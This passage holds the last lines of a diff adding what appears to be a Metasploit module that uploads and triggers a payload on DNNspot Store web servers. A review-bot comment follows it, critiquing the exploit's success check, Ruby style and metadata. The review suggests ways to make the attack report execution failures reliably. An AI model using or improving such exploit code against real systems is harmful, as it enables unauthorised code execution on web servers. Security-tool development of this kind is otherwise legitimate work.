+ 'uri' => normalize_uri("/DesktopModules/DNNspot-Store/ProductPhotos/",@payload_name)
+ })
+ end
+end
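Review bot: In `exploit`, the result of the final `send_request_cgi` GET is assigned to `res` but never examined, so a payload that was uploaded but not served (a non-200 reply or an IIS error page) is reported exactly like success; either check it, e.g. `fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Payload was not executed") unless res && res.code == 200`, or drop the assignment. Both `check` and `exploit` use `and` where `&&` is the Ruby convention, `check` could collapse to `res && res.code == 200 ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe`, and the three `send_request_cgi` hashes mix single- and double-quoted keys. The first line of the file reads `?# Exploit Title`; if that `?` is a literal character rather than a rendering of a UTF-8 byte-order mark, `?#` is parsed as a character literal and the file will not load, so the encoding of the first line is worth confirming. The module metadata is inconsistent: the `'Name'` says `<= 3.0.0` while the description says "below 3.0.0", `Arbitary` is misspelled, and the only `'References'` entry is the placeholder `http://metasploit.com` rather than the vendor URL given in the header comment; the `# Date: 23/01/2014` header also disagrees with `'DisclosureDate' => 'Jul 21 2014'`.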